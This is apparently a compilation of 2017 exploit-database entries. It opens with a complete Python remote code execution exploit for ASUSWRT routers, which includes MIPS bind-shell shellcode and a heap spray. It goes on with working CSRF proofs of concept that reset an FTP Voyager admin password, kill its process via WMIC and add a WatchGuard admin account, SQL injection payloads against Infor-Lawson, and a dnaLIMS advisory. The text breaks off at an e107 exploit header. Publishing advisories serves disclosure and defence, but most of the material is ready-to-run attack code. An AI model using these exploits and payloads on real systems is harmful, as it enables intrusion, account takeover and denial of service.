For further details check out the full exploit: networkmap-pwn.py (https://bierbaumer.net/networkmap-pwn.py)

Example:

# ./networkmap-pwn.py
[-] starting webserver
[-] received SSP discovery
[-] clearing database and crashing
[-] received SSP discovery
[-] spraying heap 1/2
[-] got shellcode request
[-] sending shellcode
[-] received SSP discovery
[-] spraying heap 2/2
[-] received SSP discovery
[-] starting payload
[-] try to connect to shell
[-] try to connect to shell
[+] connected
Linux (none) 2.6.36 #1 Fri Sep 23 12:05:55 CST 2016 mips GNU/Linux
[+] pwned




---networkmap-pwn.py---
#!/usr/bin/env python3
# ASUSWRT networkmap Remote Code Execution
# Author: Bruno Bierbaumer
# Date: 24/02/2017
# Tested version:
# RT-AC53 (3.0.0.4.380.6038)
# CVE: TODO

# Description:
# networkmap contains a stack-based buffer overflow which can be exploited to run arbitrary code.


# Lab addressing: the router's LAN address, the address this host takes on
# the local interface, and that interface's name. INTERACE is misspelled but
# used consistently throughout, so the name is left as is.
ROUTER_IP = '192.168.1.1'
IP = '192.168.1.2'
INTERACE = 'enp0s31f6'

"""
 Shellcode adjusted from https://www.exploit-db.com/exploits/13298/
"""

# Little-endian MIPS payload served by the web server below: a 1400-word NOP
# sled, then socket/bind/listen/accept/dup2/execve as annotated per
# instruction by the original author, ending in the "/bin/sh" string the
# execve reads. Kept byte-identical; do not reflow these lines.
sc = b"\x41\x41\x04\x28" *1400 #   nops
#alarm handling
sc += b"\xff\xff\x04\x28"   #     a0 <- 0                          */
sc += b"\xbb\x0f\x02\x24"   #     li      v0,4027 ( __alarm )      */
sc += b"\x0c\x01\x01\x01"   #     syscall    
sc += b"\x50\x73\x0f\x24"   #     li      t7,0x7350 (nop)          */
#/alarm
sc += b"\xe0\xff\xbd\x27"   #     addiu   sp,sp,-32                */
sc += b"\xfd\xff\x0e\x24"   #     li      t6,-3                    */
sc += b"\x27\x20\xc0\x01"   #     nor     a0,t6,zero               */
sc += b"\x27\x28\xc0\x01"   #     nor     a1,t6,zero               */
sc += b"\xff\xff\x06\x28"   #     slti    a2,zero,-1               */   
sc += b"\x57\x10\x02\x24"   #     li      v0,4183 ( __NR_socket )  */
sc += b"\x0c\x01\x01\x01"   #     syscall                          */
sc += b"\x50\x73\x0f\x24"   #     li      t7,0x7350 (nop)          */
sc += b"\xff\xff\x50\x30"   #     andi    s0,v0,0xffff             */   
sc += b"\xef\xff\x0e\x24"   #     li      t6,-17                   */
sc += b"\x27\x70\xc0\x01"   #     nor     t6,t6,zero               */
sc += b"\x13\x37\x0d\x24"   #     li      t5,0x3713 (port 0x1337)  */
sc += b"\x04\x68\xcd\x01"   #     sllv    t5,t5,t6                 */
sc += b"\xff\xfd\x0e\x24"   #     li      t6,-513                  */
sc += b"\x27\x70\xc0\x01"   #     nor     t6,t6,zero               */
sc += b"\x25\x68\xae\x01"   #     or      t5,t5,t6                 */
sc += b"\xe0\xff\xad\xaf"   #     sw      t5,-32(sp)               */
sc += b"\xe4\xff\xa0\xaf"   #     sw      zero,-28(sp)             */   
sc += b"\xe8\xff\xa0\xaf"   #     sw      zero,-24(sp)             */
sc += b"\xec\xff\xa0\xaf"   #     sw      zero,-20(sp)             */
sc += b"\x25\x20\x10\x02"   #     or      a0,s0,s0                 */
sc += b"\xef\xff\x0e\x24"   #     li      t6,-17                   */
sc += b"\x27\x30\xc0\x01"   #     nor     a2,t6,zero               */
sc += b"\xe0\xff\xa5\x23"   #     addi    a1,sp,-32                */
sc += b"\x49\x10\x02\x24"   #     li      v0,4169 ( __NR_bind )    */
sc += b"\x0c\x01\x01\x01"   #     syscall                          */
sc += b"\x50\x73\x0f\x24"   #     li      t7,0x7350 (nop)          */
sc += b"\x25\x20\x10\x02"   #     or      a0,s0,s0                 */
sc += b"\x01\x01\x05\x24"   #     li      a1,257                   */
sc += b"\x4e\x10\x02\x24"   #     li      v0,4174 ( __NR_listen )  */   
sc += b"\x0c\x01\x01\x01"   #     syscall                          */
sc += b"\x50\x73\x0f\x24"   #     li      t7,0x7350 (nop)          */
sc += b"\x25\x20\x10\x02"   #     or      a0,s0,s0                 */
sc += b"\xff\xff\x05\x28"   #     slti    a1,zero,-1               */
sc += b"\xff\xff\x06\x28"   #     slti    a2,zero,-1               */
sc += b"\x48\x10\x02\x24"   #     li      v0,4168 ( __NR_accept )  */
sc += b"\x0c\x01\x01\x01"   #     syscall                          */
sc += b"\x50\x73\x0f\x24"   #     li      t7,0x7350 (nop)          */
sc += b"\xff\xff\x50\x30"   #     andi    s0,v0,0xffff             */   
sc += b"\x25\x20\x10\x02"   #     or      a0,s0,s0                 */
sc += b"\xfd\xff\x0f\x24"   #     li      t7,-3                    */
sc += b"\x27\x28\xe0\x01"   #     nor     a1,t7,zero               */
sc += b"\xdf\x0f\x02\x24"   #     li      v0,4063 ( __NR_dup2 )    */
sc += b"\x0c\x01\x01\x01"   #     syscall                          */
sc += b"\x50\x73\x0f\x24"   #     li      t7,0x7350 (nop)          */
sc += b"\x25\x20\x10\x02"   #     or      a0,s0,s0                 */
sc += b"\x01\x01\x05\x28"   #     slti    a1,zero,0x0101           */
sc += b"\xdf\x0f\x02\x24"   #     li      v0,4063 ( __NR_dup2 )    */
sc += b"\x0c\x01\x01\x01"   #     syscall                          */
sc += b"\x50\x73\x0f\x24"   #     li      t7,0x7350 (nop)          */
sc += b"\x25\x20\x10\x02"   #     or      a0,s0,s0                 */
sc += b"\xff\xff\x05\x28"   #     slti    a1,zero,-1               */   
sc += b"\xdf\x0f\x02\x24"   #     li      v0,4063 ( __NR_dup2 )    */
sc += b"\x0c\x01\x01\x01"   #     syscall                          */
sc += b"\x50\x73\x0f\x24"   #     li      t7,0x7350 (nop)          */
sc += b"\x50\x73\x06\x24"   #     li      a2,0x7350                */
sc += b"\xff\xff\xd0\x04"   # LB: bltzal  a2,LB                    */
sc += b"\x50\x73\x0f\x24"   #     li      t7,0x7350 (nop)          */
sc += b"\xff\xff\x06\x28"   #     slti    a2,zero,-1               */
sc += b"\xdb\xff\x0f\x24"   #     li      t7,-37                   */
sc += b"\x27\x78\xe0\x01"   #     nor     t7,t7,zero               */
sc += b"\x21\x20\xef\x03"   #     addu    a0,ra,t7                 */
sc += b"\xf0\xff\xa4\xaf"   #     sw      a0,-16(sp)               */
sc += b"\xf4\xff\xa0\xaf"   #     sw      zero,-12(sp)             */
sc += b"\xf0\xff\xa5\x23"   #     addi    a1,sp,-16                */
sc += b"\xab\x0f\x02\x24"   #     li      v0,4011 ( __NR_execve )  */
sc += b"\x0c\x01\x01\x01"   #     syscall                          */
sc += b"/bin/sh";


import time
import struct
import socket
import sys
import os
import threading
import socketserver
import telnetlib

# randomize mac address
def mac():
    """Randomise the MAC address of INTERACE by shelling out to `macchanger -A`.

    INTERACE is a module-level constant defined earlier in the file (outside
    this view); it is interpolated unquoted into a shell command line, so it
    must be a plain interface name.  Output is discarded and the exit status
    is not checked.
    """
    os.system('macchanger  -A {} > /dev/null'.format(INTERACE))

# setup interface
# Bring INTERACE down, re-address it with IP, bring it up and set ROUTER_IP as
# the default gateway.  All three names are module-level constants defined
# earlier in the file; the chained shell command's exit status is ignored.
os.system('ifconfig {} down; ifconfig {} {} up; route add default gw {}'.format(INTERACE, INTERACE, IP, ROUTER_IP))


# setup minimal webserver for delivering the shellcode
class ThreadedHTTPRequestHandler(socketserver.BaseRequestHandler):
    """Per-connection handler that hands out the module-level `sc` bytes.

    Despite the name it speaks no HTTP: whatever the client sends is read
    and discarded, and the reply is the raw payload with no status line or
    headers.  On the wire this looks like a TCP service on 1337 answering
    any request with a non-HTTP binary blob.
    """

    def handle(self):
        """Read up to 1024 bytes from the peer, then write `sc` and return."""
        print('[-] got shellcode request')
        self.request.recv(1024)
        print("[-] sending shellcode")
        self.request.send(sc)

class ThreadedHTTPServer(socketserver.ThreadingMixIn, socketserver.TCPServer):
    """TCPServer that services each accepted connection on its own thread."""
    pass

print('[-] starting webserver')
# Allow the listener to rebind 0.0.0.0:1337 immediately after a restart.
socketserver.TCPServer.allow_reuse_address = True
server = ThreadedHTTPServer(('0.0.0.0', 1337), ThreadedHTTPRequestHandler)
# Serve in the background so the SSDP loop further down can own the main
# thread.  The thread is not marked daemon, so it keeps the process alive
# on its own once the main thread finishes.
t = threading.Thread(target=server.serve_forever)
t.start()

# start multicast receiver
# Join the SSDP multicast group 239.255.255.250 and listen on UDP 1900 on
# every local interface, so the router's discovery traffic is visible here.
addrinfo = socket.getaddrinfo('239.255.255.250', None)[0]
s = socket.socket(addrinfo[0], socket.SOCK_DGRAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind(('', 1900))
# Group membership request: packed group address followed by INADDR_ANY.
group_bin = socket.inet_pton(addrinfo[0], addrinfo[4][0])
mreq = group_bin + struct.pack('=I', socket.INADDR_ANY)
s.setsockopt(socket.IPPROTO_IP, socket.IP_ADD_MEMBERSHIP, mreq)

# Fresh MAC before the first stage; `state` drives the loop below through
# clean -> heap -> heap2 -> pwn.
mac()
state = 'clean'

while True:
    # Block on the next datagram.  Only the sender is inspected; the payload
    # is discarded (the name `data` is re-bound to the reply table below).
    data, sender = s.recvfrom(1500)

    # React only to discovery traffic coming from the router's port 1008.
    if sender[0] == ROUTER_IP and sender[1] == 1008:
        print("[-] received SSP discovery")

        # One canned reply per state.  'clean' and 'pwn' carry a Location
        # header of 44 filler bytes plus a fixed 3-byte tail (presumably
        # firmware-specific values for the version named in the exploit
        # header); 'heap'/'heap2' point the router at the TCP listener on
        # IP:1337 started above.  Observable on the wire: an SSDP reply
        # whose Location is not a URL, or names a non-router host:port.
        data = {}
        data['clean'] = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + b'CCCC'*11 + b'\xfc\x8c\x40/' +b'\r\n\r\n'
        data['pwn']   = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + b"AAAA"*11 + b'\x04\xd5\x41/' +b'\r\n\r\n'
        data['heap']  = b'HTTP/1.1 200 OK\r\nLocation:HTTP://' + IP.encode()+ b':1337/A\r\n\r\n'  
        data['heap2']= data['heap']

        # A new UDP socket per reply; it is never closed, so one descriptor
        # is leaked per discovery message.
        sock = socket.socket(socket.AF_INET,socket.SOCK_DGRAM) 
        sock.sendto(data[state], sender)

        # State machine.  Each transition lands on a state tested earlier in
        # this if-chain, so exactly one transition fires per datagram, and
        # every stage except 'pwn' re-randomises the MAC before advancing.
        if state == 'pwn':
            print("[-] starting payload")
            # Never returns: polls for the shell every 2 s.
            # NOTE(review): the address is hard-coded here while the check
            # above uses ROUTER_IP — presumably the same host; confirm.
            # NOTE(review): the bare `except:` also swallows KeyboardInterrupt
            # raised inside the try, so Ctrl-C may need several attempts.
            while True:
                try:
                    print("[-] try to connect to shell")
                    telnet = telnetlib.Telnet()
                    telnet.open('192.168.1.1', 0x1337, timeout=1)
                    print('[+] connected')
                    telnet.write(b'uname -a; echo [+] pwned\n')
                    telnet.interact()
                except:
                    pass
                time.sleep(2.0)

        if state == 'heap2':
            print("[-] spraying heap 2/2")
            mac()
            state = 'pwn'

        if state == 'heap':
            print("[-] spraying heap 1/2")
            mac()
            state = 'heap2'

        if state == 'clean':
            print('[-] clearing database and crashing')
            mac()
            state = 'heap'
---EOF---
            
<!--
[+] Credits: John Page AKA hyp3rlinx	
[+] Website: hyp3rlinx.altervista.org
[+] Source:  http://hyp3rlinx.altervista.org/advisories/FTP-VOYAGER-SCHEDULER-CSRF-REMOTE-CMD-EXECUTION.txt
[+] ISR: ApparitionSec            
 

Vendor:
==============
solarwinds.com
www.serv-u.com


Product:
====================
FTP Voyager Scheduler
v16.2.0


Vulnerability Type:
=============================
CSRF Remote Command Execution


CVE Reference:
==============
N/A


Security Issue:
================
Multiple cross-site request forgeries exist in the web interface of FTP Voyager Scheduler running on port 52986,
allowing remote attackers to make HTTP requests on behalf of an authenticated user if that user visits a malicious
webpage or clicks an attacker-supplied link.

FTP Voyager has a scheduler feature that lets users create tasks/commands to execute on some other action, such as
when directories are created, files are uploaded/downloaded, the Scheduler starts or stops, and so forth. Remote attackers who
successfully pull off CSRF exploitation can do things like change the Admin password or cause a persistent Denial of Service
by setting the task to terminate "FTP Voyager Scheduler" itself upon startup, among other nefarious things.


Exploit/POC:
=============

Default login no password, then set a password in FTP Voyager Scheduler Web interface.

Upon CSRF the user will get an HTTP response like the one below; we can prevent the user from seeing this message by
targeting a hidden iframe in the webpage.

<response><result>0</result><ResultText>Operation was successful.</ResultText><ObjectID>141175</ObjectID></response>


1) Change Admin passwd 
-->
<!-- PoC 1: an auto-submitted POST to the UpdateObject endpoint that sets
     AdminPassword.  Nothing in the request is specific to the victim's
     session beyond the ambient cookie, which is the CSRF root cause the
     advisory reports; the hidden iframe only hides the XML response.
     Mitigation on the server side is a per-request anti-CSRF token (or
     equivalent origin binding) on every state-changing endpoint. -->
<iframe name="hideme" style="display:none" ></iframe>

<form target="hideme" action="http://localhost:52986/Admin/XML/Result.xml?Command=UpdateObject&Object=CScheduler.0.Scheduler.0&StaticOnly=1&Sync=666" method="post">
<input type="hidden" name="AdminPassword" value="PWN123">
<input type="hidden" name="ConfirmAdminPassword" value="PWN123">
<input type="hidden" name="RemoteAdmin" value="1">
<input type="hidden" name="RemoteAdminPort" value="52986">
<input type="hidden" name="RemoteAdminSSL" value="0">
<script>document.forms[0].submit()</script>
</form>


2) Persistent Denial Of Service uses call to WMIC

<!-- PoC 2: an auto-submitted POST to the AddObject endpoint that registers
     a scheduler event (EventID=1, run on Scheduler Start) whose action is
     an external executable, so the effect persists across restarts.  As
     with PoC 1, the request is accepted on the strength of the session
     cookie alone; a request-specific anti-CSRF token would reject it. -->
<form action="http://localhost:52986/Admin/XML/Result.xml?Command=AddObject&Object=CEventAttrs.0.FVSEvent&Sync=666" method="post">
<input type="hidden" name="EventName" value="PWN">
<input type="hidden" name="Description" value="Run Command!">
<input type="hidden" name="Enabled" value="1">
<input type="hidden" name="EventID" value="1"> <!-- Run on Scheduler Start event -->
<input type="hidden" name="Action" value="2">
<input type="hidden" name="multiselect_Action" value="2">
<input type="hidden" name="EmailToAddress" value="evil@gods.abyss">
<input type="hidden" name="EmailToAddressBCC" value="">
<input type="hidden" name="ExeFilePath" value="C:\Windows\System32\wbem\WMIC.exe">
<input type="hidden" name="ExecWaitSecs" value="5">
<input type="hidden" name="Data1" value="process where name='FTP Voyager Scheduler.exe' call terminate">
<input type="hidden" name="Data2" value="&">
<script>document.forms[0].submit()</script>
</form>


<!--
Network Access:
===============
Remote


Severity:
=========
High


Disclosure Timeline:
=======================================
Vendor Notification: November 30, 2016
Result:  No Reply
Second Notification Attempt: March 5, 2017
Result: 
March 9, 2017  : Public Disclosure


[+] Disclaimer
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information
or exploits by the author or elsewhere. All content (c)

hyp3rlinx
-->
            
##################################################################
# Exploit Title: Kinsey Infor / Lawson (ESBUS) - Multiple SQL Injections 
##################################################################
# Date: 3/10/2017
##################################################################
# Exploit Author: Michael Benich
##################################################################
# Vendor homepage: http://www.kinsey.com/infor-lawson.html
##################################################################
# Version: ALL
##################################################################
# Tested on: Windows Server 2008 R2; MySQL ver 5.5
##################################################################
# CVE: CVE-2017-6550
##################################################################

Kinsey's Infor-Lawson application (formerly ESBUS) is vulnerable to SQL injection in at least two parameters:

1) TABLE parameter, PoC below

GET /esbus/servlet/GetSQLData?SCHEMA=ESBUS_INTERNAL&TABLE=SCHEDULEDTASKS UNION ALL SELECT <<ATTACKER INPUT>>&FIELD=LASTRUN&NOHEADER=1&SELECT=CLASS=com.esbus.appliance.SOD_PolicyCheck_SystemRun_TimerTask&OUT=XML HTTP/1.1

2) Query POST parameter

POST /KK_LS9ReportingPortal/GetData?SERVERID=%27;LSF_PROD& HTTP/1.1

<--snip--http headers-->

QUERY=1 AND SLEEP(5) AND ('foo'='foo')) &OUT=TAB

A JSP webshell can then be written to the /esbus/ directory.
##################################################################
Timeline: 

12/1/2016 - Contacted generic security emails
12/1/2016 - Received response from vendor ("Thanks for the info...")
2/27/2017 - Followed up with contact and intent to disclose. No reply.
3/10/2017 - Disclosure
##################################################################
 
            
Title: Multiple vulnerabilities discovered in dnaLIMS DNA sequencing
web-application
Advisory URL: https://www.shorebreaksecurity.com/blog/product-security-advisory-psa0002-dnalims/
Date published: Mar 08, 2017
Vendor: dnaTools, Inc.
CVE IDs: [2017-6526, 2017-6527, 2017-6528, 2017-6529]
USCERT VU: 929263

Vulnerability Summaries
1) Improperly protected web shell [CVE-2017-6526]
dnaLIMS requires authentication to view cgi-bin/dna/sysAdmin.cgi, which is
a web shell included with the software running as the web user.  However,
sending a POST request to that page bypasses authentication checks,
including the UID parameter within the POST request.

2) Unauthenticated Directory Traversal [CVE-2017-6527]
The viewAppletFsa.cgi seqID parameter is vulnerable to a null terminated
directory traversal attack. This allows an unauthenticated attacker to
retrieve files on the operating system accessible by the permissions of the
web server. This page also does not require authentication, allowing any
person on the Internet to exploit this vulnerability.

3) Insecure Password Storage  [CVE-2017-6528]
An option, which is most likely the default, allows the password file
(/home/dna/spool/.pfile) to store clear text passwords.  When combined with
the unauthenticated directory traversal vulnerability, it is possible to
gain the username and password for all users of the software and gain
complete control of the software.

4) Session Hijacking [CVE-2017-6529]
Each user of the dnaLIMS software is assigned a unique four-digit user
identification number (UID) upon account creation.  These numbers appear to
be assigned sequentially. Multiple pages of the dnaLIMS application require
that this UID be passed as a URL parameter in order to view the content of
the page.
Consider the following example:
The URL "http://<SERVER NAME
REDACTED>/cgi-bin/dna/seqreq2N.cgi?username=61685578,2410" is a valid URL
to view the page for sequencing requests for the user with the UID of 2410. The
username parameter of the URL is the mechanism for authentication to the
system. The first eight-digit number of the username parameter appears to
be a session identifier as it changes every time the user logs in from the
password.cgi page, however this value is not checked by the seqreq2N.cgi
page. This allows an attacker to guess the four-digit UID of valid user
accounts that have an active session. The user with the UID of 2419
currently has an active session, so we can simply hijack this user's
session by requesting this page and specifying the UID 2419.

5) Cross-site Scripting
The seqID parameter of the viewAppletFsa.cgi page is vulnerable to a
reflected cross site scripting attack via GET request as seen in the
following URL:
http://<SERVER NAME REDACTED>/cgi-bin/dna/viewAppletFsa.cgi?seqID=7415-7<SCRIPT
Alert("XSS") </SCRIPT>

6) Cross-site Scripting
The navUserName parameter of the seqTable*.cgi page is vulnerable to a
reflected cross site scripting attack via POST request as seen in the
example below. The * reflects a short name for a client (e.g., for Shorebreak
Security it may be seqTableSS.cgi or seqTableshorebreak.cgi) and may not be
vulnerable for all dnaLIMS installs.

7) Improperly Protected Content

Many of the pages within the admin interface are not properly protected
from viewing by authenticated users.  This can give an attacker additional
information about the system, or allow changes to the system/software
configuration.

Testing was conducted on a live production system; therefore the pages
themselves were tested, but forms within these pages were not.

This is also not an exhaustive list of improperly protected pages:

cgi-bin/dna/configuration.cgi

cgi-bin/dna/createCoInfo.cgi

cgi-bin/dna/configSystem.cgi

cgi-bin/dna/combineAcctsN.cgi

Disclosure Timeline

Thu, Nov 10, 2016 at 4:25 PM: Reached out to vendor requesting PGP key to
securely exchange details of vulnerabilities identified

Thu, Nov 10, 2016 at 4:55 PM: Vendor requests report be physically mailed
to PO box via Postal Service

Wed, Nov 16, 2016, at 11:14 AM: Report mailed to vendor via USPS Certified
Mail

Thu, Dec 8, 2016, at 10:43 AM: Request Vendor acknowledge receipt of the
report

Thu, Dec 8, 2016, at 12:53 PM: Vendor acknowledges receipt; suggests
placing the software behind a firewall as a solution to the vulnerabilities.

Thu, Dec 8, 2016, at 1:54 PM: Reply that the offered solution mitigates
some risk, but does not address the vulnerabilities; inquire if there is a
plan to address the vulnerabilities

Thu, Dec 8, 2016, at 3:13 PM: Vendor replies "Yes, we have a plan. Please
gather a DNA sequence, PO Number, or Fund Number and go to your local
grocery store and see what it will buy you."

Tue, Feb 28, 2017, at 1:15 PM: Vulnerabilities disclosed to US-CERT

Tue, Mar 7, 2017, at 8:19 AM: Vulnerabilities submitted to MITRE for CVE
assignment

Wed, Mar 8, 2017, at 12:00 PM: Vulnerabilities disclosed publicly
            
<!--
KL-001-2017-004 : WatchGuard XTMv User Management Cross-Site Request Forgery

Title: WatchGuard XTMv User Management Cross-Site Request Forgery
Advisory ID: KL-001-2017-004
Publication Date: 2017.03.10
Publication URL: https://www.korelogic.com/Resources/Advisories/KL-001-2017-004.txt


1. Vulnerability Details

     Affected Vendor: WatchGuard
     Affected Product: XTMv
     Affected Version: v11.12 Build 516911
     Platform: Embedded Linux
     CWE Classification: CWE-352: Cross-Site Request Forgery (CSRF)
     Impact: Privileged Access
     Attack vector: HTTP

2. Vulnerability Description

     Lack of CSRF protection in the Add User functionality of the
     XTMv management portal can be leveraged to create arbitrary
     administrator-level accounts.

3. Technical Description

     As observed below, no CSRF token is in use when adding a new
     user to the management portal.

     POST /put_data/ HTTP/1.1
     Host: 1.3.3.7:8080
     Accept: */*
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     Content-Type: application/json
     X-Requested-With: XMLHttpRequest
     Content-Length: 365
     Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287
     DNT: 1
     Connection: close


{"__class__":"PageSystemManageAdminUsersObj","__module__":"modules.scripts.page.system.PageSystemManageAdminUsersObj","users":[],"add_entries":[{"__class__":"AdminUserObj","__module__":"modules.scripts.vo.AdminUserObj","name":"hacked","domain":"Firebox-DB","role":"Device
Administrator","hash":"hacked","enabled":1,"rowindex":-1}],"upd_entries":[],"del_entries":[]}

     The HTTP response indicates that the changes were successful.

     HTTP/1.1 200 OK
     X-Frame-Options: SAMEORIGIN
     Content-Length: 68
     Expires: Sun, 28 Jan 2007 00:00:00 GMT
     Vary: Accept-Encoding
     Server: CherryPy/3.6.0
     Pragma: no-cache
     Cache-Control: no-cache, must-revalidate
     Date: Sat, 10 Dec 2016 18:08:22 GMT
     Content-Type: application/json
     Set-Cookie: session_id=50f607247265897581a407bfb8b75e30d2b77287; expires=Sat, 10 Dec 2016 19:08:22 GMT; httponly;
Path=/; secure
     Connection: close

     {"status": true, "message": ["The changes were saved successfully"]}

     Now, the newly created backdoor account can be accessed.

     POST /agent/login HTTP/1.1
     Host: 1.3.3.7:8080
     Accept: application/xml, text/xml, */*; q=0.01
     Accept-Language: en-US,en;q=0.5
     Accept-Encoding: gzip, deflate, br
     Content-Type: text/xml
     X-Requested-With: XMLHttpRequest
     Content-Length: 414
     Cookie: sessionid=515F007C5BD062C2122008544DB127F80000000C; session_id=0a3d24668f5c3b2c7ba7016d179f5f574e1aaf53
     DNT: 1
     Connection: close


<methodCall><methodName>login</methodName><params><param><value><struct><member><name>password</name><value><string>hacked</string></value></member><member><name>user</name><value><string>hacked</string></value></member><member><name>domain</name><value><string>Firebox-DB</string></value></member><member><name>uitype</name><value><string>2</string></value></member></struct></value></param></params></methodCall>

     The response below shows the application issuing an authenticated
     session cookie.

     HTTP/1.1 200 OK
     X-Frame-Options: SAMEORIGIN
     Content-type: text/xml
     Set-Cookie: sessionid=74B0DC5119495CFF2AE8944A625558EC00000008;secure;HttpOnly
     Connection: close
     Date: Sat, 10 Dec 2016 19:55:26 GMT
     Server: none
     Content-Length: 751

     <?xml version="1.0"?>
     <methodResponse>
       <params>
         <param>
           <value>
             <struct>
               <member><name>sid</name><value>74B0DC5119495CFF2AE8944A625558EC00000008</value></member>
               <member><name>response</name><value></value></member>
               <member>
                 <name>readwrite</name>
                 <value><struct>
                   <member><name>privilege</name><value>2</value></member>
                   <member><name>peer_sid</name><value>0</value></member>
                   <member><name>peer_name</name><value>error</value></member>
                   <member><name>peer_ip</name><value>0.0.0.0</value></member>
                 </struct></value>
               </member>
             </struct>
           </value>
         </param>
       </params>
     </methodResponse>

4. Mitigation and Remediation Recommendation

     The vendor has remediated this vulnerability in WatchGuard
     XTMv v11.12.1. Release notes and upgrade instructions are
     available at:

     https://www.watchguard.com/support/release-notes/fireware/11/en-US/EN_ReleaseNotes_Fireware_11_12_1/index.html

5. Credit

     This vulnerability was discovered by Matt Bergin (@thatguylevel)
     of KoreLogic, Inc. and Joshua Hardin.

6. Disclosure Timeline

     2017.01.13 - KoreLogic sends vulnerability report and PoC to
                  WatchGuard.
     2017.01.13 - WatchGuard acknowledges receipt of report.
     2017.01.23 - WatchGuard informs KoreLogic that the
                  vulnerability will be addressed in the forthcoming
                  v11.12.1 firmware, scheduled for general
                  availability on or around 2017.02.21.
     2017.02.22 - WatchGuard releases v11.12.1.
     2017.03.10 - KoreLogic public disclosure.

7. Proof of Concept
-->

     <!-- PoC: a plain HTML form with enctype="text/plain", so the browser
          submits it cross-origin without a CORS preflight.  The whole JSON
          body lives in the single input's `name` attribute (HTML-entity
          encoded); the trailing `=` from the empty value is absorbed as
          junk after the closing brace.  Root cause: /put_data/ accepts
          the session cookie alone and neither requires a CSRF token nor
          rejects a non-application/json Content-Type.  Fixed by the
          vendor in v11.12.1 per section 4 above. -->
     <html>
       <body>
         <form action="https://1.3.3.7:8080/put_data/" method="POST" enctype="text/plain">
           <input type="hidden"
name="&#x7b;"&#x5f;&#x5f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;"&#x3a;"&#x50;&#x61;&#x67;&#x65;&#x53;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x4d;&#x61;&#x6e;&#x61;&#x67;&#x65;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x73;&#x4f;&#x62;&#x6a;"&#x2c;"&#x5f;&#x5f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x5f;&#x5f;"&#x3a;"&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x73;&#x2e;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x73;&#x2e;&#x70;&#x61;&#x67;&#x65;&#x2e;&#x73;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x2e;&#x50;&#x61;&#x67;&#x65;&#x53;&#x79;&#x73;&#x74;&#x65;&#x6d;&#x4d;&#x61;&#x6e;&#x61;&#x67;&#x65;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x73;&#x4f;&#x62;&#x6a;"&#x2c;"&#x75;&#x73;&#x65;&#x72;&#x73;"&#x3a;&#x5b;&#x5d;&#x2c;"&#x61;&#x64;&#x64;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;"&#x3a;&#x5b;&#x7b;"&#x5f;&#x5f;&#x63;&#x6c;&#x61;&#x73;&#x73;&#x5f;&#x5f;"&#x3a;"&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x4f;&#x62;&#x6a;"&#x2c;"&#x5f;&#x5f;&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x5f;&#x5f;"&#x3a;"&#x6d;&#x6f;&#x64;&#x75;&#x6c;&#x65;&#x73;&#x2e;&#x73;&#x63;&#x72;&#x69;&#x70;&#x74;&#x73;&#x2e;&#x76;&#x6f;&#x2e;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x55;&#x73;&#x65;&#x72;&#x4f;&#x62;&#x6a;"&#x2c;"&#x6e;&#x61;&#x6d;&#x65;"&#x3a;"&#x68;&#x61;&#x63;&#x6b;&#x65;&#x64;&#x33;"&#x2c;"&#x64;&#x6f;&#x6d;&#x61;&#x69;&#x6e;"&#x3a;"&#x46;&#x69;&#x72;&#x65;&#x62;&#x6f;&#x78;&#x2d;&#x44;&#x42;"&#x2c;"&#x72;&#x6f;&#x6c;&#x65;"&#x3a;"&#x44;&#x65;&#x76;&#x69;&#x63;&#x65;&#x20;&#x41;&#x64;&#x6d;&#x69;&#x6e;&#x69;&#x73;&#x74;&#x72;&#x61;&#x74;&#x6f;&#x72;"&#x2c;"&#x68;&#x61;&#x73;&#x68;"&#x3a;"&#x68;&#x61;&#x63;&#x6b;&#x65;&#x64;&#x33;"&#x2c;"&#x65;&#x6e;&#x61;&#x62;&#x6c;&#x65;&#x64;"&#x3a;&#x31;&#x2c;"&#x72;&#x6f;&#x77;&#x69;&#x6e;&#x64;&#x65;&#x78;"&#x3a;&#x2d;&#x31;&#x7d;&#x5d;&#x2c;"&#x75;&#x70;&#x64;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;"&#x3a;&#x5b;&#x5d;&#x2c;"&#x64;&#x65;&#x6c;&#x5f;&#x65;&#x6e;&#x74;&#x72;&#x69;&#x65;&#x73;"&#x3a;&#x5b;&#x5d;&#x7d;"
value="" />
           <input type="submit" value="Trigger" />
         </form>
       </body>
     </html>

<!--
The contents of this advisory are copyright(c) 2017
KoreLogic, Inc. and are licensed under a Creative Commons
Attribution Share-Alike 4.0 (United States) License:
http://creativecommons.org/licenses/by-sa/4.0/

KoreLogic, Inc. is a founder-owned and operated company with a
proven track record of providing security services to entities
ranging from Fortune 500 to small and mid-sized companies. We
are a highly skilled team of senior security consultants doing
by-hand security assessments for the most important networks in
the U.S. and around the world. We are also developers of various
tools and resources aimed at helping the security community.
https://www.korelogic.com/about-korelogic.html

Our public vulnerability disclosure policy is available at:
https://www.korelogic.com/KoreLogic-Public-Vulnerability-Disclosure-Policy.v2.2.txt
-->
            
#!/usr/bin/perl
#
#
# e107 <= 2.1.4 "keyword" Blind SQL Injection Exploit
#
# --------------------------------------------------------------------------
# [*] Discovered by staker - staker[at]hotmail[dot]it 
